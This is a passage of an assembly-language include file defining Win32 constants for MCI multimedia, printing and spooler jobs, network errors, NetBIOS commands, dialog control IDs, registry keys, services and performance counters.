MCI_TRACK equ 10h
MCI_OPEN_SHAREABLE equ 100h
MCI_OPEN_ELEMENT equ 200h
MCI_OPEN_ALIAS equ 400h
MCI_OPEN_ELEMENT_ID equ 800h
MCI_OPEN_TYPE_ID equ 1000h
MCI_OPEN_TYPE equ 2000h
MCI_SEEK_TO_START equ 100h
MCI_SEEK_TO_END equ 200h
MCI_STATUS_ITEM equ 100h
MCI_STATUS_START equ 200h
MCI_STATUS_LENGTH equ 1h
MCI_STATUS_POSITION equ 2h
MCI_STATUS_NUMBER_OF_TRACKS equ 3h
MCI_STATUS_MODE equ 4h
MCI_STATUS_MEDIA_PRESENT equ 5h
MCI_STATUS_TIME_FORMAT equ 6h
MCI_STATUS_READY equ 7h
MCI_STATUS_CURRENT_TRACK equ 8h
MCI_INFO_PRODUCT equ 100h
MCI_INFO_FILE equ 200h
MCI_GETDEVCAPS_ITEM equ 100h
MCI_GETDEVCAPS_CAN_RECORD equ 1h
MCI_GETDEVCAPS_HAS_AUDIO equ 2h
MCI_GETDEVCAPS_HAS_VIDEO equ 3h
MCI_GETDEVCAPS_DEVICE_TYPE equ 4h
MCI_GETDEVCAPS_USES_FILES equ 5h
MCI_GETDEVCAPS_COMPOUND_DEVICE equ 6h
MCI_GETDEVCAPS_CAN_EJECT equ 7h
MCI_GETDEVCAPS_CAN_PLAY equ 8h
MCI_GETDEVCAPS_CAN_SAVE equ 9h
MCI_SYSINFO_QUANTITY equ 100h
MCI_SYSINFO_OPEN equ 200h
MCI_SYSINFO_NAME equ 400h
MCI_SYSINFO_INSTALLNAME equ 800h
MCI_SET_DOOR_OPEN equ 100h
MCI_SET_DOOR_CLOSED equ 200h
MCI_SET_TIME_FORMAT equ 400h
MCI_SET_AUDIO equ 800h
MCI_SET_VIDEO equ 1000h
MCI_SET_ON equ 2000h
MCI_SET_OFF equ 4000h
MCI_SET_AUDIO_ALL equ 4001h
MCI_SET_AUDIO_LEFT equ 4002h
MCI_SET_AUDIO_RIGHT equ 4003h
MCI_BREAK_KEY equ 100h
MCI_BREAK_HWND equ 200h
MCI_BREAK_OFF equ 400h
MCI_RECORD_INSERT equ 100h
MCI_RECORD_OVERWRITE equ 200h
MCI_SOUND_NAME equ 100h
MCI_SAVE_FILE equ 100h
MCI_LOAD_FILE equ 100h
MCI_VD_MODE_PARK equ MCI_VD_OFFSET+1
MCI_VD_MEDIA_CLV equ MCI_VD_OFFSET+2
MCI_VD_MEDIA_CAV equ MCI_VD_OFFSET+3
MCI_VD_MEDIA_OTHER equ MCI_VD_OFFSET+4
MCI_VD_FORMAT_TRACK equ 4001h
MCI_VD_PLAY_REVERSE equ 10000h
MCI_VD_PLAY_FAST equ 20000h
MCI_VD_PLAY_SPEED equ 40000h
MCI_VD_PLAY_SCAN equ 80000h
MCI_VD_PLAY_SLOW equ 100000h
MCI_VD_SEEK_REVERSE equ 10000h
MCI_VD_STATUS_SPEED equ 4002h
MCI_VD_STATUS_FORWARD equ 4003h
MCI_VD_STATUS_MEDIA_TYPE equ 4004h
MCI_VD_STATUS_SIDE equ 4005h
MCI_VD_STATUS_DISC_SIZE equ 4006h
MCI_VD_GETDEVCAPS_CLV equ 10000h
MCI_VD_GETDEVCAPS_CAV equ 20000h
MCI_VD_SPIN_UP equ 10000h
MCI_VD_SPIN_DOWN equ 20000h
MCI_VD_GETDEVCAPS_CAN_REVERSE equ 4002h
MCI_VD_GETDEVCAPS_FAST_RATE equ 4003h
MCI_VD_GETDEVCAPS_SLOW_RATE equ 4004h
MCI_VD_GETDEVCAPS_NORMAL_RATE equ 4005h
MCI_VD_STEP_FRAMES equ 10000h
MCI_VD_STEP_REVERSE equ 20000h
MCI_VD_ESCAPE_STRING equ 100h
MCI_WAVE_PCM equ MCI_WAVE_OFFSET+0
MCI_WAVE_MAPPER equ MCI_WAVE_OFFSET+1
MCI_WAVE_OPEN_BUFFER equ 10000h
MCI_WAVE_SET_FORMATTAG equ 10000h
MCI_WAVE_SET_CHANNELS equ 20000h
MCI_WAVE_SET_SAMPLESPERSEC equ 40000h
MCI_WAVE_SET_AVGBYTESPERSEC equ 80000h
MCI_WAVE_SET_BLOCKALIGN equ 100000h
MCI_WAVE_SET_BITSPERSAMPLE equ 200000h
MCI_WAVE_INPUT equ 400000h
MCI_WAVE_OUTPUT equ 800000h
MCI_WAVE_STATUS_FORMATTAG equ 4001h
MCI_WAVE_STATUS_CHANNELS equ 4002h
MCI_WAVE_STATUS_SAMPLESPERSEC equ 4003h
MCI_WAVE_STATUS_AVGBYTESPERSEC equ 4004h
MCI_WAVE_STATUS_BLOCKALIGN equ 4005h
MCI_WAVE_STATUS_BITSPERSAMPLE equ 4006h
MCI_WAVE_STATUS_LEVEL equ 4007h
MCI_WAVE_SET_ANYINPUT equ 4000000h
MCI_WAVE_SET_ANYOUTPUT equ 8000000h
MCI_WAVE_GETDEVCAPS_INPUTS equ 4001h
MCI_WAVE_GETDEVCAPS_OUTPUTS equ 4002h
MCI_SEQ_DIV_PPQN equ 0+MCI_SEQ_OFFSET
MCI_SEQ_DIV_SMPTE_24 equ 1+MCI_SEQ_OFFSET
MCI_SEQ_DIV_SMPTE_25 equ 2+MCI_SEQ_OFFSET
MCI_SEQ_DIV_SMPTE_30DROP equ 3+MCI_SEQ_OFFSET
MCI_SEQ_DIV_SMPTE_30 equ 4+MCI_SEQ_OFFSET
MCI_SEQ_FORMAT_SONGPTR equ 4001h
MCI_SEQ_FILE equ 4002h
MCI_SEQ_MIDI equ 4003h
MCI_SEQ_SMPTE equ 4004h
MCI_SEQ_NONE equ 65533
MCI_SEQ_MAPPER equ 65535
MCI_SEQ_STATUS_TEMPO equ 4002h
MCI_SEQ_STATUS_PORT equ 4003h
MCI_SEQ_STATUS_SLAVE equ 4007h
MCI_SEQ_STATUS_MASTER equ 4008h
MCI_SEQ_STATUS_OFFSET equ 4009h
MCI_SEQ_STATUS_DIVTYPE equ 400Ah
MCI_SEQ_SET_TEMPO equ 10000h
MCI_SEQ_SET_PORT equ 20000h
MCI_SEQ_SET_SLAVE equ 40000h
MCI_SEQ_SET_MASTER equ 80000h
MCI_SEQ_SET_OFFSET equ 1000000h
MCI_ANIM_OPEN_WS equ 10000h
MCI_ANIM_OPEN_PARENT equ 20000h
MCI_ANIM_OPEN_NOSTATIC equ 40000h
MCI_ANIM_PLAY_SPEED equ 10000h
MCI_ANIM_PLAY_REVERSE equ 20000h
MCI_ANIM_PLAY_FAST equ 40000h
MCI_ANIM_PLAY_SLOW equ 80000h
MCI_ANIM_PLAY_SCAN equ 100000h
MCI_ANIM_STEP_REVERSE equ 10000h
MCI_ANIM_STEP_FRAMES equ 20000h
MCI_ANIM_STATUS_SPEED equ 4001h
MCI_ANIM_STATUS_FORWARD equ 4002h
MCI_ANIM_STATUS_HWND equ 4003h
MCI_ANIM_STATUS_HPAL equ 4004h
MCI_ANIM_STATUS_STRETCH equ 4005h
MCI_ANIM_INFO_TEXT equ 10000h
MCI_ANIM_GETDEVCAPS_CAN_REVERSE equ 4001h
MCI_ANIM_GETDEVCAPS_FAST_RATE equ 4002h
MCI_ANIM_GETDEVCAPS_SLOW_RATE equ 4003h
MCI_ANIM_GETDEVCAPS_NORMAL_RATE equ 4004h
MCI_ANIM_GETDEVCAPS_PALETTES equ 4006h
MCI_ANIM_GETDEVCAPS_CAN_STRETCH equ 4007h
MCI_ANIM_GETDEVCAPS_MAX_WINDOWS equ 4008h
MCI_ANIM_REALIZE_NORM equ 10000h
MCI_ANIM_REALIZE_BKGD equ 20000h
MCI_ANIM_WINDOW_HWND equ 10000h
MCI_ANIM_WINDOW_STATE equ 40000h
MCI_ANIM_WINDOW_TEXT equ 80000h
MCI_ANIM_WINDOW_ENABLE_STRETCH equ 100000h
MCI_ANIM_WINDOW_DISABLE_STRETCH equ 200000h
MCI_ANIM_WINDOW_DEFAULT equ 0h
MCI_ANIM_RECT equ 10000h
MCI_ANIM_PUT_SOURCE equ 20000h
MCI_ANIM_PUT_DESTINATION equ 40000h
MCI_ANIM_WHERE_SOURCE equ 20000h
MCI_ANIM_WHERE_DESTINATION equ 40000h
MCI_ANIM_UPDATE_HDC equ 20000h
MCI_OVLY_OPEN_WS equ 10000h
MCI_OVLY_OPEN_PARENT equ 20000h
MCI_OVLY_STATUS_HWND equ 4001h
MCI_OVLY_STATUS_STRETCH equ 4002h
MCI_OVLY_INFO_TEXT equ 10000h
MCI_OVLY_GETDEVCAPS_CAN_STRETCH equ 4001h
MCI_OVLY_GETDEVCAPS_CAN_FREEZE equ 4002h
MCI_OVLY_GETDEVCAPS_MAX_WINDOWS equ 4003h
MCI_OVLY_WINDOW_HWND equ 10000h
MCI_OVLY_WINDOW_STATE equ 40000h
MCI_OVLY_WINDOW_TEXT equ 80000h
MCI_OVLY_WINDOW_ENABLE_STRETCH equ 100000h
MCI_OVLY_WINDOW_DISABLE_STRETCH equ 200000h
MCI_OVLY_WINDOW_DEFAULT equ 0h
MCI_OVLY_RECT equ 10000h
MCI_OVLY_PUT_SOURCE equ 20000h
MCI_OVLY_PUT_DESTINATION equ 40000h
MCI_OVLY_PUT_FRAME equ 80000h
MCI_OVLY_PUT_VIDEO equ 100000h
MCI_OVLY_WHERE_SOURCE equ 20000h
MCI_OVLY_WHERE_DESTINATION equ 40000h
MCI_OVLY_WHERE_FRAME equ 80000h
MCI_OVLY_WHERE_VIDEO equ 100000h
CAPS1 equ 94
C1_TRANSPARENT equ 1h
NEWTRANSPARENT equ 3
QUERYROPSUPPORT equ 40
SELECTDIB equ 41
SE_ERR_SHARE equ 26
SE_ERR_ASSOCINCOMPLETE equ 27
SE_ERR_DDETIMEOUT equ 28
SE_ERR_DDEFAIL equ 29
SE_ERR_DDEBUSY equ 30
SE_ERR_NOASSOC equ 31
PRINTER_CONTROL_PAUSE equ 1
PRINTER_CONTROL_RESUME equ 2
PRINTER_CONTROL_PURGE equ 3
PRINTER_STATUS_PAUSED equ 1h
PRINTER_STATUS_ERROR equ 2h
PRINTER_STATUS_PENDING_DELETION equ 4h
PRINTER_STATUS_PAPER_JAM equ 8h
PRINTER_STATUS_PAPER_OUT equ 10h
PRINTER_STATUS_MANUAL_FEED equ 20h
PRINTER_STATUS_PAPER_PROBLEM equ 40h
PRINTER_STATUS_OFFLINE equ 80h
PRINTER_STATUS_IO_ACTIVE equ 100h
PRINTER_STATUS_BUSY equ 200h
PRINTER_STATUS_PRINTING equ 400h
PRINTER_STATUS_OUTPUT_BIN_FULL equ 800h
PRINTER_STATUS_NOT_AVAILABLE equ 1000h
PRINTER_STATUS_WAITING equ 2000h
PRINTER_STATUS_PROCESSING equ 4000h
PRINTER_STATUS_INITIALIZING equ 8000h
PRINTER_STATUS_WARMING_UP equ 10000h
PRINTER_STATUS_TONER_LOW equ 20000h
PRINTER_STATUS_NO_TONER equ 40000h
PRINTER_STATUS_PAGE_PUNT equ 80000h
PRINTER_STATUS_USER_INTERVENTION equ 100000h
PRINTER_STATUS_OUT_OF_MEMORY equ 200000h
PRINTER_STATUS_DOOR_OPEN equ 400000h
PRINTER_ATTRIBUTE_QUEUED equ 1h
PRINTER_ATTRIBUTE_DIRECT equ 2h
PRINTER_ATTRIBUTE_DEFAULT equ 4h
PRINTER_ATTRIBUTE_SHARED equ 8h
PRINTER_ATTRIBUTE_NETWORK equ 10h
PRINTER_ATTRIBUTE_HIDDEN equ 20h
PRINTER_ATTRIBUTE_LOCAL equ 40h
NO_PRIORITY equ 0
MAX_PRIORITY equ 99
MIN_PRIORITY equ 1
DEF_PRIORITY equ 1
JOB_CONTROL_PAUSE equ 1
JOB_CONTROL_RESUME equ 2
JOB_CONTROL_CANCEL equ 3
JOB_CONTROL_RESTART equ 4
JOB_STATUS_PAUSED equ 1h
JOB_STATUS_ERROR equ 2h
JOB_STATUS_DELETING equ 4h
JOB_STATUS_SPOOLING equ 8h
JOB_STATUS_PRINTING equ 10h
JOB_STATUS_OFFLINE equ 20h
JOB_STATUS_PAPEROUT equ 40h
JOB_STATUS_PRINTED equ 80h
JOB_POSITION_UNSPECIFIED equ 0
FORM_BUILTIN equ 1h
PRINTER_CONTROL_SET_STATUS equ 4
PRINTER_ATTRIBUTE_WORK_OFFLINE equ 400h
PRINTER_ATTRIBUTE_ENABLE_BIDI equ 800h
JOB_CONTROL_DELETE equ 5
JOB_STATUS_USER_INTERVENTION equ 10000h
DI_CHANNEL equ 1
DI_READ_SPOOL_JOB equ 3
PORT_TYPE_WRITE equ 1h
PORT_TYPE_READ equ 2h
PORT_TYPE_REDIRECTED equ 4h
PORT_TYPE_NET_ATTACHED equ 8h
PRINTER_ENUM_DEFAULT equ 1h
PRINTER_ENUM_LOCAL equ 2h
PRINTER_ENUM_CONNECTIONS equ 4h
PRINTER_ENUM_FAVORITE equ 4h
PRINTER_ENUM_NAME equ 8h
PRINTER_ENUM_REMOTE equ 10h
PRINTER_ENUM_SHARED equ 20h
PRINTER_ENUM_NETWORK equ 40h
PRINTER_ENUM_EXPAND equ 4000h
PRINTER_ENUM_CONTAINER equ 8000h
PRINTER_ENUM_ICONMASK equ 0FF0000h
PRINTER_ENUM_ICON1 equ 10000h
PRINTER_ENUM_ICON2 equ 20000h
PRINTER_ENUM_ICON3 equ 40000h
PRINTER_ENUM_ICON4 equ 80000h
PRINTER_ENUM_ICON5 equ 100000h
PRINTER_ENUM_ICON6 equ 200000h
PRINTER_ENUM_ICON7 equ 400000h
PRINTER_ENUM_ICON8 equ 800000h
PRINTER_CHANGE_ADD_PRINTER equ 1h
PRINTER_CHANGE_SET_PRINTER equ 2h
PRINTER_CHANGE_DELETE_PRINTER equ 4h
PRINTER_CHANGE_PRINTER equ 0FFh
PRINTER_CHANGE_ADD_JOB equ 100h
PRINTER_CHANGE_SET_JOB equ 200h
PRINTER_CHANGE_DELETE_JOB equ 400h
PRINTER_CHANGE_WRITE_JOB equ 800h
PRINTER_CHANGE_JOB equ 0FF00h
PRINTER_CHANGE_ADD_FORM equ 10000h
PRINTER_CHANGE_SET_FORM equ 20000h
PRINTER_CHANGE_DELETE_FORM equ 40000h
PRINTER_CHANGE_FORM equ 70000h
PRINTER_CHANGE_ADD_PORT equ 100000h
PRINTER_CHANGE_CONFIGURE_PORT equ 200000h
PRINTER_CHANGE_DELETE_PORT equ 400000h
PRINTER_CHANGE_PORT equ 700000h
PRINTER_CHANGE_ADD_PRINT_PROCESSOR equ 1000000h
PRINTER_CHANGE_DELETE_PRINT_PROCESSOR equ 4000000h
PRINTER_CHANGE_PRINT_PROCESSOR equ 7000000h
PRINTER_CHANGE_ADD_PRINTER_DRIVER equ 10000000h
PRINTER_CHANGE_DELETE_PRINTER_DRIVER equ 40000000h
PRINTER_CHANGE_PRINTER_DRIVER equ 70000000h
PRINTER_CHANGE_TIMEOUT equ 80000000h
PRINTER_CHANGE_ALL equ 7777FFFFh
PRINTER_ERROR_INFORMATION equ 80000000h
PRINTER_ERROR_WARNING equ 40000000h
PRINTER_ERROR_SEVERE equ 20000000h
PRINTER_ERROR_OUTOFPAPER equ 1h
PRINTER_ERROR_JAM equ 2h
PRINTER_ERROR_OUTOFTONER equ 4h
SERVER_ACCESS_ADMINISTER equ 1h
SERVER_ACCESS_ENUMERATE equ 2h
PRINTER_ACCESS_ADMINISTER equ 4h
PRINTER_ACCESS_USE equ 8h
JOB_ACCESS_ADMINISTER equ 10h
SERVER_ALL_ACCESS equ STANDARD_RIGHTS_REQUIRED|SERVER_ACCESS_ADMINISTER|
SERVER_ACCESS_ENUMERATE
SERVER_READ equ STANDARD_RIGHTS_READ|SERVER_ACCESS_ENUMERATE
SERVER_WRITE equ STANDARD_RIGHTS_WRITE|SERVER_ACCESS_ADMINISTER|SERVER_ACCESS_ENUMERATE
SERVER_EXECUTE equ STANDARD_RIGHTS_EXECUTE|SERVER_ACCESS_ENUMERATE
PRINTER_ALL_ACCESS equ STANDARD_RIGHTS_REQUIRED|PRINTER_ACCESS_ADMINISTER|PRINTER_ACCESS_USE
PRINTER_READ equ STANDARD_RIGHTS_READ|PRINTER_ACCESS_USE
PRINTER_WRITE equ STANDARD_RIGHTS_WRITE|PRINTER_ACCESS_USE
PRINTER_EXECUTE equ STANDARD_RIGHTS_EXECUTE|PRINTER_ACCESS_USE
JOB_ALL_ACCESS equ STANDARD_RIGHTS_REQUIRED|JOB_ACCESS_ADMINISTER
JOB_READ equ STANDARD_RIGHTS_READ|JOB_ACCESS_ADMINISTER
JOB_WRITE equ STANDARD_RIGHTS_WRITE|JOB_ACCESS_ADMINISTER
JOB_EXECUTE equ STANDARD_RIGHTS_EXECUTE|JOB_ACCESS_ADMINISTER
RESOURCE_CONNECTED equ 1h
RESOURCE_PUBLICNET equ 2h
RESOURCE_GLOBALNET equ 2h
RESOURCE_REMEMBERED equ 3h
RESOURCE_RECENT equ 4h
RESOURCE_CONTEXT equ 5h
RESOURCETYPE_ANY equ 0h
RESOURCETYPE_DISK equ 1h
RESOURCETYPE_PRINT equ 2h
RESOURCETYPE_UNKNOWN equ 0FFFFh
RESOURCEUSAGE_CONNECTABLE equ 1h
RESOURCEUSAGE_CONTAINER equ 2h
RESOURCEUSAGE_RESERVED equ 80000000h
RESOURCEDISPLAYTYPE_GENERIC equ 0h
RESOURCEDISPLAYTYPE_DOMAIN equ 1h
RESOURCEDISPLAYTYPE_SERVER equ 2h
RESOURCEDISPLAYTYPE_SHARE equ 3h
RESOURCEDISPLAYTYPE_FILE equ 4h
RESOURCEDISPLAYTYPE_GROUP equ 5h
CONNECT_UPDATE_PROFILE equ 1h
WN_SUCCESS equ NO_ERROR
WN_NOT_SUPPORTED equ ERROR_NOT_SUPPORTED
WN_NET_ERROR equ ERROR_UNEXP_NET_ERR
WN_MORE_DATA equ ERROR_MORE_DATA
WN_BAD_POINTER equ ERROR_INVALID_ADDRESS
WN_BAD_VALUE equ ERROR_INVALID_PARAMETER
WN_BAD_PASSWORD equ ERROR_INVALID_PASSWORD
WN_ACCESS_DENIED equ ERROR_ACCESS_DENIED
WN_FUNCTION_BUSY equ ERROR_BUSY
WN_WINDOWS_ERROR equ ERROR_UNEXP_NET_ERR
WN_BAD_USER equ ERROR_BAD_USERNAME
WN_OUT_OF_MEMORY equ ERROR_NOT_ENOUGH_MEMORY
WN_NO_NETWORK equ ERROR_NO_NETWORK
WN_EXTENDED_ERROR equ ERROR_EXTENDED_ERROR
WN_NOT_CONNECTED equ ERROR_NOT_CONNECTED
WN_OPEN_FILES equ ERROR_OPEN_FILES
WN_DEVICE_IN_USE equ ERROR_DEVICE_IN_USE
WN_BAD_NETNAME equ ERROR_BAD_NET_NAME
WN_BAD_LOCALNAME equ ERROR_BAD_DEVICE
WN_ALREADY_CONNECTED equ ERROR_ALREADY_ASSIGNED
WN_DEVICE_ERROR equ ERROR_GEN_FAILURE
WN_CONNECTION_CLOSED equ ERROR_CONNECTION_UNAVAIL
WN_NO_NET_OR_BAD_PATH equ ERROR_NO_NET_OR_BAD_PATH
WN_BAD_PROVIDER equ ERROR_BAD_PROVIDER
WN_CANNOT_OPEN_PROFILE equ ERROR_CANNOT_OPEN_PROFILE
WN_BAD_PROFILE equ ERROR_BAD_PROFILE
WN_BAD_HANDLE equ ERROR_INVALID_HANDLE
WN_NO_MORE_ENTRIES equ ERROR_NO_MORE_ITEMS
WN_NOT_CONTAINER equ ERROR_NOT_CONTAINER
WN_NO_ERROR equ NO_ERROR
NCBNAMSZ equ 16
MAX_LANA equ 254
NAME_FLAGS_MASK equ 87h
GROUP_NAME equ 80h
UNIQUE_NAME equ 0h
REGISTERING equ 0h
REGISTERED equ 4h
DEREGISTERED equ 5h
DUPLICATE equ 6h
DUPLICATE_DEREG equ 7h
LISTEN_OUTSTANDING equ 1h
CALL_PENDING equ 2h
SESSION_ESTABLISHED equ 3h
HANGUP_PENDING equ 4h
HANGUP_COMPLETE equ 5h
SESSION_ABORTED equ 6h
NCBCALL equ 10h
NCBLISTEN equ 11h
NCBHANGUP equ 12h
NCBSEND equ 14h
NCBRECV equ 15h
NCBRECVANY equ 16h
NCBCHAINSEND equ 17h
NCBDGSEND equ 20h
NCBDGRECV equ 21h
NCBDGSENDBC equ 22h
NCBDGRECVBC equ 23h
NCBADDNAME equ 30h
NCBDELNAME equ 31h
NCBRESET equ 32h
NCBASTAT equ 33h
NCBSSTAT equ 34h
NCBCANCEL equ 35h
NCBADDGRNAME equ 36h
NCBENUM equ 37h
NCBUNLINK equ 70h
NCBSENDNA equ 71h
NCBCHAINSENDNA equ 72h
NCBLANSTALERT equ 73h
NCBACTION equ 77h
NCBFINDNAME equ 78h
NCBTRACE equ 79h
ASYNCH equ 80h
NRC_GOODRET equ 0h
NRC_BUFLEN equ 1h
NRC_ILLCMD equ 3h
NRC_CMDTMO equ 5h
NRC_INCOMP equ 6h
NRC_BADDR equ 7h
NRC_SNUMOUT equ 8h
NRC_NORES equ 9h
NRC_SCLOSED equ 0Ah
NRC_CMDCAN equ 0Bh
NRC_DUPNAME equ 0Dh
NRC_NAMTFUL equ 0Eh
NRC_ACTSES equ 0Fh
NRC_LOCTFUL equ 11h
NRC_REMTFUL equ 12h
NRC_ILLNN equ 13h
NRC_NOCALL equ 14h
NRC_NOWILD equ 15h
NRC_INUSE equ 16h
NRC_NAMERR equ 17h
NRC_SABORT equ 18h
NRC_NAMCONF equ 19h
NRC_IFBUSY equ 21h
NRC_TOOMANY equ 22h
NRC_BRIDGE equ 23h
NRC_CANOCCR equ 24h
NRC_CANCEL equ 26h
NRC_DUPENV equ 30h
NRC_ENVNOTDEF equ 34h
NRC_OSRESNOTAV equ 35h
NRC_MAXAPPS equ 36h
NRC_NOSAPS equ 37h
NRC_NORESOURCES equ 38h
NRC_INVADDRESS equ 39h
NRC_INVDDID equ 3Bh
NRC_LOCKFAIL equ 3Ch
NRC_OPENERR equ 3Fh
NRC_SYSTEM equ 40h
NRC_PENDING equ 0FFh
EXCEPTION_EXECUTE_HANDLER equ 1
EXCEPTION_CONTINUE_SEARCH equ 0
EXCEPTION_CONTINUE_EXECUTION equ -1
ctlFirst equ 400h
ctlLast equ 4FFh
psh1 equ 400h
psh2 equ 401h
psh3 equ 402h
psh4 equ 403h
psh5 equ 404h
psh6 equ 405h
psh7 equ 406h
psh8 equ 407h
psh9 equ 408h
psh10 equ 409h
psh11 equ 40Ah
psh12 equ 40Bh
psh13 equ 40Ch
psh14 equ 40Dh
psh15 equ 40Eh
pshHelp equ psh15
psh16 equ 40Fh
chx1 equ 410h
chx2 equ 411h
chx3 equ 412h
chx4 equ 413h
chx5 equ 414h
chx6 equ 415h
chx7 equ 416h
chx8 equ 417h
chx9 equ 418h
chx10 equ 419h
chx11 equ 41Ah
chx12 equ 41Bh
chx13 equ 41Ch
chx14 equ 41Dh
chx15 equ 41Eh
chx16 equ 41Dh
rad1 equ 420h
rad2 equ 421h
rad3 equ 422h
rad4 equ 423h
rad5 equ 424h
rad6 equ 425h
rad7 equ 426h
rad8 equ 427h
rad9 equ 428h
rad10 equ 429h
rad11 equ 42Ah
rad12 equ 42Bh
rad13 equ 42Ch
rad14 equ 42Dh
rad15 equ 42Eh
rad16 equ 42Fh
grp1 equ 430h
grp2 equ 431h
grp3 equ 432h
grp4 equ 433h
frm1 equ 434h
frm2 equ 435h
frm3 equ 436h
frm4 equ 437h
rct1 equ 438h
rct2 equ 439h
rct3 equ 43Ah
rct4 equ 43Bh
ico1 equ 43Ch
ico2 equ 43Dh
ico3 equ 43Eh
ico4 equ 43Fh
stc1 equ 440h
stc2 equ 441h
stc3 equ 442h
stc4 equ 443h
stc5 equ 444h
stc6 equ 445h
stc7 equ 446h
stc8 equ 447h
stc9 equ 448h
stc10 equ 449h
stc11 equ 44Ah
stc12 equ 44Bh
stc13 equ 44Ch
stc14 equ 44Dh
stc15 equ 44Eh
stc16 equ 44Fh
stc17 equ 450h
stc18 equ 451h
stc19 equ 452h
stc20 equ 453h
stc21 equ 454h
stc22 equ 455h
stc23 equ 456h
stc24 equ 457h
stc25 equ 458h
stc26 equ 459h
stc27 equ 45Ah
stc28 equ 45Bh
stc29 equ 45Ch
stc30 equ 45Dh
stc31 equ 45Eh
stc32 equ 45Fh
lst1 equ 460h
lst2 equ 461h
lst3 equ 462h
lst4 equ 463h
lst5 equ 464h
lst6 equ 465h
lst7 equ 466h
lst8 equ 467h
lst9 equ 468h
lst10 equ 469h
lst11 equ 46Ah
lst12 equ 46Bh
lst13 equ 46Ch
lst14 equ 46Dh
lst15 equ 46Eh
lst16 equ 46Fh
cmb1 equ 470h
cmb2 equ 471h
cmb3 equ 472h
cmb4 equ 473h
cmb5 equ 474h
cmb6 equ 475h
cmb7 equ 476h
cmb8 equ 477h
cmb9 equ 478h
cmb10 equ 479h
cmb11 equ 47Ah
cmb12 equ 47Bh
cmb13 equ 47Ch
cmb14 equ 47Dh
cmb15 equ 47Eh
cmb16 equ 47Fh
edt1 equ 480h
edt2 equ 481h
edt3 equ 482h
edt4 equ 483h
edt5 equ 484h
edt6 equ 485h
edt7 equ 486h
edt8 equ 487h
edt9 equ 488h
edt10 equ 489h
edt11 equ 48Ah
edt12 equ 48Bh
edt13 equ 48Ch
edt14 equ 48Dh
edt15 equ 48Eh
edt16 equ 48Fh
scr1 equ 490h
scr2 equ 491h
scr3 equ 492h
scr4 equ 493h
scr5 equ 494h
scr6 equ 495h
scr7 equ 496h
scr8 equ 497h
FILEOPENORD equ 1536
MULTIFILEOPENORD equ 1537
PRINTDLGORD equ 1538
PRNSETUPDLGORD equ 1539
FINDDLGORD equ 1540
REPLACEDLGORD equ 1541
FONTDLGORD equ 1542
FORMATDLGORD31 equ 1543
FORMATDLGORD30 equ 1544
HKEY_CLASSES_ROOT equ 80000000h
HKEY_CURRENT_USER equ 80000001h
HKEY_LOCAL_MACHINE equ 80000002h
HKEY_USERS equ 80000003h
HKEY_PERFORMANCE_DATA equ 80000004h
HKEY_CURRENT_CONFIG equ 80000005h
HKEY_DYN_DATA equ 80000006h
SERVICE_NO_CHANGE equ 0FFFFh
SERVICE_ACTIVE equ 1h
SERVICE_INACTIVE equ 2h
SERVICE_STATE_ALL equ SERVICE_ACTIVE|SERVICE_INACTIVE
SERVICE_CONTROL_STOP equ 1h
SERVICE_CONTROL_PAUSE equ 2h
SERVICE_CONTROL_CONTINUE equ 3h
SERVICE_CONTROL_INTERROGATE equ 4h
SERVICE_CONTROL_SHUTDOWN equ 5h
SERVICE_STOPPED equ 1h
SERVICE_START_PENDING equ 2h
SERVICE_STOP_PENDING equ 3h
SERVICE_RUNNING equ 4h
SERVICE_CONTINUE_PENDING equ 5h
SERVICE_PAUSE_PENDING equ 6h
SERVICE_PAUSED equ 7h
SERVICE_ACCEPT_STOP equ 1h
SERVICE_ACCEPT_PAUSE_CONTINUE equ 2h
SERVICE_ACCEPT_SHUTDOWN equ 4h
SC_MANAGER_CONNECT equ 1h
SC_MANAGER_CREATE_SERVICE equ 2h
SC_MANAGER_ENUMERATE_SERVICE equ 4h
SC_MANAGER_LOCK equ 8h
SC_MANAGER_QUERY_LOCK_STATUS equ 10h
SC_MANAGER_MODIFY_BOOT_CONFIG equ 20h
SC_MANAGER_ALL_ACCESS equ STANDARD_RIGHTS_REQUIRED|SC_MANAGER_CONNECT|
SC_MANAGER_CREATE_SERVICE|SC_MANAGER_ENUMERATE_SERVICE|SC_MANAGER_LOCK
SERVICE_QUERY_CONFIG equ 1h
SERVICE_CHANGE_CONFIG equ 2h
SERVICE_QUERY_STATUS equ 4h
SERVICE_ENUMERATE_DEPENDENTS equ 8h
SERVICE_START equ 10h
SERVICE_STOP equ 20h
SERVICE_PAUSE_CONTINUE equ 40h
SERVICE_INTERROGATE equ 80h
SERVICE_USER_DEFINED_CONTROL equ 100h
SERVICE_ALL_ACCESS equ STANDARD_RIGHTS_REQUIRED|SERVICE_QUERY_CONFIG|SERVICE_CHANGE_CONFIG|
SERVICE_QUERY_STATUS
PERF_DATA_VERSION equ 1
PERF_DATA_REVISION equ 1
PERF_NO_INSTANCES equ -1
PERF_SIZE_DWORD equ 0h
PERF_SIZE_LARGE equ 100h
PERF_SIZE_ZERO equ 200h
PERF_SIZE_VARIABLE_LEN equ 300h
PERF_TYPE_NUMBER equ 0h
PERF_TYPE_COUNTER equ 400h
PERF_TYPE_TEXT equ 800h
PERF_TYPE_ZERO equ 0C00h
PERF_NUMBER_HEX equ 0h
PERF_NUMBER_DECIMAL equ 10000h
PERF_NUMBER_DEC_1000 equ 20000h
PERF_COUNTER_VALUE equ 0h
PERF_COUNTER_RATE equ 10000h
PERF_COUNTER_FRACTION equ 20000h
PERF_COUNTER_BASE equ 30000h
PERF_COUNTER_ELAPSED equ 40000h
PERF_COUNTER_QUEUELEN equ 50000h
PERF_COUNTER_HISTOGRAM equ 60000h
PERF_TEXT_UNICODE equ 0h
PERF_TEXT_ASCII equ 10000h
PERF_TIMER_TICK equ 0h
PERF_TIMER_100NS equ 100000h
PERF_OBJECT_TIMER equ 200000h
PERF_DELTA_COUNTER equ 400000h
PERF_DELTA_BASE equ 800000h
PERF_INVERSE_COUNTER equ 1000000h
PERF_MULTI_COUNTER equ 2000000h
PERF_DISPLAY_NO_SUFFIX equ 0h
PERF_DISPLAY_PER_SEC equ 10000000h
PERF_DISPLAY_PERCENT equ 20000000h
PERF_DISPLAY_SECONDS equ 30000000h
PERF_DISPLAY_NOSHOW equ 40000000h
PERF_COUNTER_COUNTER equ PERF_SIZE_DWORD|PERF_TYPE_COUNTER|PERF_COUNTER_RATE|PERF_TIMER_TICK|
PERF_DELTA_COUNTER|PERF_DISPLAY_PER_SEC
PERF_COUNTER_TIMER equ PERF_SIZE_LARGE|PERF_TYPE_COUNTER|PERF_COUNTER_RATE|PERF_TIMER_TICK|
